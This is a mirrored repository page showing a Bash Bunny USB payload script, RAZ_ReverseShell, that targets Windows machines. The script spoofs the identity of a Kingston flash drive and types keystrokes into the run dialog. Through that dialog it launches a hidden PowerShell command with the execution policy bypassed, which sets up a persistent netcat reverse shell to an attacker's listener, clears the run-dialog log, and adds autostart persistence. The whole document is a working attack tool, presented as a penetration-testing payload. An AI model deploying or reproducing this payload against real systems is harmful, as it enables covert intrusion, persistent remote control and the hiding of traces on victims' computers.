hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
bashbunny-payloads/payloads/library/remote_access/RAZ_ReverseShell/payload.txt
James Cullum (Pseudonym) 33ba79d692 Updated RaZ_ReverseShell 
- Clean up traces
- Bugfixes on newer firmware
- Improved documentation
- Fake hardware identifier
- Added persistence via autostart
- Disconnect on end
2018-04-16 22:57:50 +02:00

103 lines
4.3 KiB
Bash
Raw Blame History

#!/bin/bash
#
# Title: RAZ_ReverseShell
# Author: RalphyZ & JamesCullum
# Version: 2.0
# Target: Windows 7+ (verified on Windows 10)
# Dependencies: The following files must exist in the switch folder:
# nc.exe - Windows binary for netcat (download statically compiled ncat from https://nmap.org/ncat/, f.e. http://nmap.org/dist/ncat-portable-5.59BETA1.zip)
# listener_port.txt - The port number for the netcat listener
# listener_ip.txt - The IP Address for the netcat listener
# payload.ps1 - The payload being deployed
#
# Description: Configures a persistent netcat reverse cmd shell at a given IP and Port on the remote computer.
# The reverse shell establishes the connection after every windows restart and right after the attack.
# This script removes the log of the run dialog.
# It can auto-increment the listener port so that the PenTester can create several listeners, and target multiple machines while on a walkabout in an office.
#
# Colors:
# | Status | Color | Description |
# | ---------- | ------------------------------| ------------------------------------------------ |
# | SETUP | Magenta solid | Preparing the script and loading config |
# | FAIL1 | Red slow blink | Could not find the listener_port.txt file |
# | FAIL2 | Red fast blink | Could not find the listener_ip.txt file |
# | FAIL3 | Red very fast blink | Could not find the nc.exe file |
# | SPECIAL | Cyan inverted single blink | Incrementing the port in listener_port.txt |
# | ATTACK | Yellow single blink | Running the Powershell payload |
# | FINISH | Green blink followed by SOLID | Script is finished |
# Options
KEYBOARD_LANGUAGE = us #keyboard languge
AUTO_INCREMENT = false #increment port on end of every run
######## INITIALIZATION ########
# Magenta solid
LED SETUP
# Set attack mode to HID and Storage
# Change own identifier to random USB stick
# - Manufacturer: Kingston
# - Model: DataTraveler 150 (32GB)
# - Serial number: https://web.archive.org/web/20170711011214/https://fakeflashnews.wordpress.com/2009/03/16/kingston-counterfeit-fake-32gb-datatraveler-150-usb-flash-drive-found-on-ebay/
ATTACKMODE HID STORAGE VID_0X0951 PID_0X1621 MAN_KINGSTON SN_00015788
# Get the switch position
GET SWITCH_POSITION
# Check for all the files - error if not found. If found, put into variables
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then
LED FAIL1
exit 1
else
my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt`
fi
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then
LED FAIL2
exit 1
else
my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt`
fi
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then
LED FAIL3
exit 1
fi
# If the target computer has a different language enabled, activate this here.
# You will also need to install the language json file on the bunny.
QUACK SET_LANGUAGE ${KEYBOARD_LANGUAGE} # older firmware
DUCKY_LANG ${KEYBOARD_LANGUAGE} # newer firmware
######## ATTACK ########
# Start the attack - yellow single blink
LED ATTACK
# Execute the powershell command in the run box with the appropriate variables
QUACK GUI r
QUACK DELAY 250
QUACK STRING "powershell -ExecutionPolicy bypass -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\payload.ps1') -IP ${my_ip} -Port ${my_port}\""
QUACK ENTER
######## FINISH ########
# If auto_increment, then update the listener_port file
if [ "$AUTO_INCREMENT" = true ] ; then
LED SPECIAL
echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt
# Allow the write to sync to the USB
SYNC
fi
# The powershell script will try to copy the nc.exe from the bunny.
# We should give it some time to copy it, instead of disconnecting right away.
sleep 3
# Stop emulation
ATTACKMODE OFF
# Green 1000ms VERYFAST blink followed by SOLID
LED FINISH
Reference in New Issue View Git Blame Copy Permalink